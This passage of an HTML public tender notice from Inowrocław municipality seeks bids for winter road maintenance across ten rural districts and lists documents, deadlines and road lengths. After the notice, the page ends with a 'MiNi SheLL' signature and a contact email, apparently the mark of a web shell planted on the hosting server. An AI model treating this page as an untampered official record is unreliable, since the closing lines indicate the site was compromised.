<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- formularz ofertowy;
- Pełnomocnictwo udzielone Pełnomocnikowi wyznaczonemu do reprezentowania Wykonawców, wspólników (załączyć do ofert składanych przez wykonawców występujących wspólnie jak i przez spółki cywilne) - Załącznik Nr 5.
- oświadczenie o zapoznaniu się z wzorem umowy - załącznik nr 6 do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>3.	Zamawiający przewiduje możliwość wprowadzenia zmian do zawartej umowy w formie pisemnego aneksu na następujących warunkach:

a)	jeżeli Zamawiający dokonał zmiany sposobu wykonania części przedmiotu umowy, a także zmiany zakresu umowy, o którym mowa w § 2 pkt 2 umowy, czego nie można było przewidzieć przed zawarciem umowy,
b)	jeżeli zmianie ulegnie urzędowa stawka VAT,
c)	na skutek siły wyższej zajdzie konieczność zmiany terminu wykonania zamówienia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.inowroclaw.ug.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Inowrocław
ul. Królowej Jadwigi 43
88-100 Inowrocław
II piętro, pokój 17.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.10.2013 godzina 10:00, miejsce: Urząd Gminy Inowrocław
ul. Królowej Jadwigi 43
88-100 Inowrocław
I piętro, pokój 11.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zimowe utrzymanie dróg wchodzących w skład Rejonu I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zimowe utrzymanie dróg wchodzących w skład Rejonu I - obejmuje drogi leżące w obrębie miejscowości:
Batkowo, Popowice, Żalinowo, Piotrkowice, Krusza Podlotowa, Krusza Zamkowa, Krusza Duchowna, Tupadły
Długość dróg objęta odśnieżaniem: 12,096 km.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zimowe utrzymanie dróg wchodzących w skład Rejonu II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zimowe utrzymanie dróg wchodzących w skład Rejonu II - obejmuje drogi leżące w obrębie miejscowości:
Sikorowo, Jaronty, Miechowice
Długość dróg objęta odśnieżaniem: 12,445 km.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zimowe utrzymanie dróg wchodzących w skład Rejonu III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zimowe utrzymanie dróg wchodzących w skład Rejonu III - obejmuje drogi leżące w obrębie miejscowości:
Dulsk, Łojewo, Ostrowo Krzyckie, Sikorowo
Długość dróg objęta odśnieżaniem: 12,003 km.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zimowe utrzymanie dróg wchodzących w skład Rejonu IV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zimowe utrzymanie dróg wchodzących w skład Rejonu IV - obejmuje drogi leżące w obrębie miejscowości:
Dulsk, Góra Karczyn, Łąkocin, Witowy, Pławinek
Długość dróg objęta odśnieżaniem: 14,297km.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zimowe utrzymanie dróg wchodzących w skład Rejonu V.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zimowe utrzymanie dróg wchodzących w skład Rejonu V - obejmuje drogi leżące w obrębie miejscowości:
Marulewy, Komaszyce, Turzany, Dziennice, Trzaski, Balczewo, Marcinkowo
Długość dróg objęta odśnieżaniem: 18,026 km.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zimowe utrzymanie dróg wchodzących w skład Rejonu VI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zimowe utrzymanie dróg wchodzących w skład Rejonu VI - obejmuje drogi leżące w obrębie miejscowości:
Marulewy, Jacewo, Olszewice, Słońsko, Balin, Latkowo
Długość dróg objęta odśnieżaniem: 15,410 km.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zimowe utrzymanie dróg wchodzących w skład Rejonu VII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zimowe utrzymanie dróg wchodzących w skład Rejonu VII - obejmuje drogi leżące w obrębie miejscowości:
Jacewo, Kłopot, Orłowo, Gnojno, Strzemkowo
Długość dróg objęta odśnieżaniem: 14,06 km.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zimowe utrzymanie dróg wchodzących w skład Rejonu VIII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zimowe utrzymanie dróg wchodzących w skład Rejonu VIII - obejmuje drogi leżące w obrębie miejscowości:
Mimowola, Cieślin, Sławęcinek, Sławęcin, Sójkowo, Kruśliwiec
Długość dróg objęta odśnieżaniem: 13,718 km.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zimowe utrzymanie dróg wchodzących w skład Rejonu IX.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zimowe utrzymanie dróg wchodzących w skład Rejonu IX - obejmuje drogi leżące w obrębie miejscowości:
Pławin, Radłówek, Turlejewo, Borkowo, Jaksice (cześć zachodnia od drogi krajowej nr 25),
Długość dróg objęta odśnieżaniem: 10,006 km.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zimowe utrzymanie dróg wchodzących w skład Rejonu X.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zimowe utrzymanie dróg wchodzących w skład Rejonu X - obejmuje drogi leżące w obrębie miejscowości:
Oporówek, Czyste, Jaksice (część wschodnia od drogi krajowej nr 25), Stefanowo, Jaksiczki.
Długość dróg objęta odśnieżaniem: 10,245 km.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com